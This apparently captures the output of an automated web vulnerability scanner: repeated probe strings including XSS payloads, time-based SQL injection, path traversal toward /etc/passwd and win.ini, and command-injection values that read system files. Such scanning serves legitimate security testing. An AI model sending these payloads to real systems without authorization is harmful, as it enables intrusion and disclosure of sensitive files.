
1

1

1<video><source onerror="javascript:prompt(963413)">

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991434)"></g></svg>

`cat /etc/passwd`

1

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

1<div style=width:expression(prompt(919599))>

|cat /etc/passwd#

${100090+100128}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

1

1<iframe src='data:text/html

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

1&n973693=v960317

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<body onload=prompt(978167)>

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

EpEkbhN4'

testasp.vulnweb.com

'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963341)>

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

PDhgrIdX')

"

1

1

1<img src=xyz OnErRor=prompt(982566)>

'

/etc/passwd

1

1

ubpqR5JL'))

1

${@print(md5(acunetix_wvs_security_test))}

1

1<img/src=">" onerror=alert(955128)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

-1

1<ScRiPt%20>prompt(980585)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

http://hitV1GUjDA72I.bxss.me/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1&lt

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

1

&dir

1

comments

1

mt6pvPOY'

http://www.acunetix.tst

1

comments

'&dir&'

\xf6<img acu onmouseover=prompt(960734) //\xf6>

'"

1'"()&%<ScRiPt >prompt(966130)</ScRiPt>

1

1

pWvT1ddR')

file:///etc/passwd

comments/.

<!--

'"()&%<ScRiPt >prompt(918947)</ScRiPt>

"&dir&"

1<input autofocus onfocus=prompt(938735)>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

5XxbIZt9'))

1

1

|dir

<a href='http://www.acunetix.com'>website security</a>

1_925587

1

1

1

WEB-INF/web.xml

'|dir

[url=http://www.acunetix.com]website security[/url]

1

1

WEB-INF\web.xml

1_Ck2kz <ScRiPt >prompt(965768)</ScRiPt>

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu7182\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7182

1

................windowswin.ini

1

acux3627\xc0\xbez1\xc0\xbcz2a\x90bcxuca3627

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(921368)</ScRiPt>

1

1

1<script>prompt(934965)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(974649)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951685></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(900263)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(964694)">

1

1

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900272)"></g></svg>

WEB-INF\web.xml

1

1

1

1<div style=width:expression(prompt(923828))>

1

1

1

1

1<iframe src='data:text/html

1

1

1

response.write(9902414*9270762)

1

1<body onload=prompt(950138)>

&cat /etc/passwd&

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999821)>

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9902414*9270762)+'

'&cat /etc/passwd&'

1

1

1<img src=xyz OnErRor=prompt(937876)>

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9902414*9270762)+"

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(985862)>

1

if(now()=sysdate(),sleep(17.5),0)/*'XOR(if(now()=sysdate(),sleep(17.5),0))OR'"XOR(if(now()=sysdate(),sleep(17.5),0))OR"*/

1

cat /etc/passwd

1

1

1

1<ScRiPt%20>prompt(990528)</sCripT>

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(17.5)))v)/*'+(select(0)from(select(sleep(17.5)))v)+'"+(select(0)from(select(sleep(17.5)))v)+"*/

1

1

1

`cat /etc/passwd`

${99640+100005}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1&lt

|cat /etc/passwd#

1

1

1&n972040=v978418

\xf6<img acu onmouseover=prompt(907774) //\xf6>

-1)

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

'|'ld

1<input autofocus onfocus=prompt(935919)>

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

ViSREyqs'

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

"|"ld

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

'

1

7B4SVRos')

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

1

lItY4xaK'))

"

1

1_rydgm <ScRiPt >prompt(924205)</ScRiPt>

'

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1

||cat /etc/passwd

1

1

1

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

Psgx1yU6'

1

http://hit1KDyghzPcP.bxss.me/

1

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

xGibgKXv')

1

1

'&dir&'

1

1

http://www.acunetix.tst

YzGTm1zp'))

comments

1

1

'"

1

"&dir&"

comments

file:///etc/passwd

1

<!--

1

1

1'"()&%<ScRiPt >prompt(939236)</ScRiPt>

comments/.

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

'"()&%<ScRiPt >prompt(969242)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

1_938730

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

acu9465\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9465

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

acux6192\xc0\xbez1\xc0\xbcz2a\x90bcxuca6192

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

response.write(9303487*9966607)

1<ScRiPt >prompt(993816)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(947079)</script>

'+response.write(9303487*9966607)+'

1

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(988249)</ScRiPt>

"+response.write(9303487*9966607)+"

1

'&cat /etc/passwd&'

WEB-INF/web.xml

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957421></ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

${100142+100314}

WEB-INF\web.xml

1<ScRiPt >prompt(925027)</ScRiPt>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<video><source onerror="javascript:prompt(932622)">

1

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1&n936378=v996268

)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981992)"></g></svg>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

-1)

1

!(()&&!|*|*|

1

1<div style=width:expression(prompt(981931))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

'"()

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

-1))

1

1

"|"ld

1

1<iframe src='data:text/html

1

CSUeVtSj'

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<body onload=prompt(986131)>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

4ugBawfU')

/etc/passwd

1

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(913232)>

1

qg0eTi17'))

1

'

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<img src=xyz OnErRor=prompt(981991)>

${@print(md5(acunetix_wvs_security_test))}

1

1

acunetix_wvs_invalid_filename

-1)

1

http://hitimMAKlNc2A.bxss.me/

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<img/src=">" onerror=alert(991108)>

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1<ScRiPt%20>prompt(915138)</sCripT>

1

comments

1

sUR2Y5TC'

1

1

1

1

http://www.acunetix.tst

comments/.

&dir

1&lt

1

'"

NbCX9yTI')

1

'&dir&'

\xf6<img acu onmouseover=prompt(922093) //\xf6>

1

bCvDCRAu'))

1'"()&%<ScRiPt >prompt(905678)</ScRiPt>

1

1

1

<!--

file:///etc/passwd

1

"&dir&"

1<input autofocus onfocus=prompt(946250)>

'"()&%<ScRiPt >prompt(973371)</ScRiPt>

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1_930248

|dir

1

1

WEB-INF/web.xml

[url=http://www.acunetix.com]website security[/url]

1

1

1

'|dir

1_NqHBH <ScRiPt >prompt(957766)</ScRiPt>

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu9639\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9639

................windowswin.ini

1

1

1

acux7191\xc0\xbez1\xc0\xbcz2a\x90bcxuca7191

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(990268)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(948388)</script>

1

1

1

1

1<ScRiPt >prompt(971898)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9534448*9259850)

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952085></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

'+response.write(9534448*9259850)+'

1

1<ScRiPt >prompt(905152)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

"+response.write(9534448*9259850)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(965181)">

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947573)"></g></svg>

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1<div style=width:expression(prompt(916898))>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${100013+100011}

`cat /etc/passwd`

1<iframe src='data:text/html

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<body onload=prompt(990953)>

1

1&n952597=v955745

-1

1

|cat /etc/passwd#

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984085)>

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

-1)

'"()

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img src=xyz OnErRor=prompt(991769)>

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'

1<img/src=">" onerror=alert(984698)>

"|"ld

1

testasp.vulnweb.com

1

/etc/passwd

^(#$!@#$)(()))******

1

05Bp7fWC'

"

1<ScRiPt%20>prompt(954856)</sCripT>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1&lt

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

6jwlFFpt')

1

'

1

1

1

1

m4JwAvqH'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

\xf6<img acu onmouseover=prompt(944706) //\xf6>

1

1

1

1

"

1

-1

http://hitxCMc4hKPSA.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(983916)>

1

1

1

1

-1)

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

http://www.acunetix.tst

1

&dir

comments

1

-1))

file:///etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

comments

/\../\../\../\../\../\../\../etc/passwd

wSdIazgB'

'"

'&dir&'

1

1'"()&%<ScRiPt >prompt(957883)</ScRiPt>

comments/.

1_7Ewgv <ScRiPt >prompt(907123)</ScRiPt>

1

1

WEB-INF/web.xml

"&dir&"

'"()&%<ScRiPt >prompt(975932)</ScRiPt>

<!--

B2Je5bll')

1

1

1

1

WEB-INF\web.xml

s8SRSBV5'))

1

1_943808

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

../../../../../../../../../../boot.ini

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu1825\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1825

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

acux3333\xc0\xbez1\xc0\xbcz2a\x90bcxuca3333

1

1

1<ScRiPt >prompt(982761)</ScRiPt>

1

1<script>prompt(979908)</script>

1

response.write(9814436*9017645)

WEB-INF/web.xml

1

1

'+response.write(9814436*9017645)+'

1

1<ScRiPt >prompt(962660)</ScRiPt>

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1

"+response.write(9814436*9017645)+"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976398></ScRiPt>

'&cat /etc/passwd&'

1

1

1

1<ScRiPt >prompt(949850)</ScRiPt>

1

1

1

1

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(920990)">

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901243)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

-1

`cat /etc/passwd`

1

1

1

${100207+99541}

1

1<div style=width:expression(prompt(903381))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

SomeCustomInjectedHeader:injected_by_wvs

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n987067=v981761

1<iframe src='data:text/html

1

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

../../../../../../../../../../etc/passwd.jpg

-1))

1

)

1

1<body onload=prompt(938634)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

FyU1HVzK'

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927262)>

1

3CAdGuuC')

^(#$!@#$)(()))******

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

LdWjvviW'))

1<img src=xyz OnErRor=prompt(952250)>

1

'"()

-1

1

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(960758)>

-1)

1

'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1<ScRiPt%20>prompt(993513)</sCripT>

1

-1))

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

gH30vVHz'

1

1&lt

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

G6piazQE')

http://hitixnPj7bRGS.bxss.me/

&dir

\xf6<img acu onmouseover=prompt(972287) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

1

1

N5DVOesS'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

1<input autofocus onfocus=prompt(950941)>

1

1

1

1

'&dir&'

http://www.acunetix.tst

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

'"

[url=http://www.acunetix.com]website security[/url]

1'"()&%<ScRiPt >prompt(916033)</ScRiPt>

comments

"&dir&"

<!--

1

1

|dir

1

comments/.

1

1_A4hwu <ScRiPt >prompt(975308)</ScRiPt>

'"()&%<ScRiPt >prompt(980834)</ScRiPt>

1

file:///etc/passwd

1

1

1

'|dir

1_916724

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

acu9346\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9346

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux7770\xc0\xbez1\xc0\xbcz2a\x90bcxuca7770

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(964180)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<script>prompt(941626)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(979343)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940289></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(943859)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(973442)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(927122)"></g></svg>

1

response.write(9001596*9471613)

1

1<div style=width:expression(prompt(981162))>

1

'+response.write(9001596*9471613)+'

1<iframe src='data:text/html

1<body onload=prompt(954760)>

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

WEB-INF/web.xml

"+response.write(9001596*9471613)+"

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902401)>

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(983242)>

1

1

1

1

"&cat /etc/passwd&"

${99927+99287}

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<img/src=">" onerror=alert(944841)>

1

cat /etc/passwd

if(now()=sysdate(),sleep(9.36),0)/*'XOR(if(now()=sysdate(),sleep(9.36),0))OR'"XOR(if(now()=sysdate(),sleep(9.36),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<ScRiPt%20>prompt(910592)</sCripT>

1

(select(0)from(select(sleep(9.36)))v)/*'+(select(0)from(select(sleep(9.36)))v)+'"+(select(0)from(select(sleep(9.36)))v)+"*/

1&n974035=v944697

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

-1

1

1&lt

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

-1)

\xf6<img acu onmouseover=prompt(950060) //\xf6>

!(()&&!|*|*|

|cat /etc/passwd#

1

-1))

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

'"()

1<input autofocus onfocus=prompt(967422)>

'

1

3sS0vkQa'

1

'|'ld

"

<a href='http://www.acunetix.com'>website security</a>

1

1

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

R07Mjzcb')

1

"|"ld

1

1

1

1_bKslq <ScRiPt >prompt(947779)</ScRiPt>

q5B4q00g'))

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1

http://hitUG5qunDXOF.bxss.me/

1

1

1

'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

acunetix_wvs_invalid_filename

1

1

1

1

"

1

comments

Mug25nUB'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

http://www.acunetix.tst

1

'"

1

LbryXQ8h')

comments

1

file:///etc/passwd

&dir

1

<!--

1'"()&%<ScRiPt >prompt(978883)</ScRiPt>

1

comments/.

PyLuLNnC'))

1

'"()&%<ScRiPt >prompt(959097)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1

"&dir&"

WEB-INF/web.xml

1

1_998337

1

1

|dir

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

acu9059\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9059

..\..\..\..\..\..\..\..\windows\win.ini

acux10635\xc0\xbez1\xc0\xbcz2a\x90bcxuca10635

1

1

1

1<ScRiPt >prompt(937212)</ScRiPt>

response.write(9642596*9516802)

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9642596*9516802)+'

1<script>prompt(988400)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9642596*9516802)+"

1

1<ScRiPt >prompt(916085)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

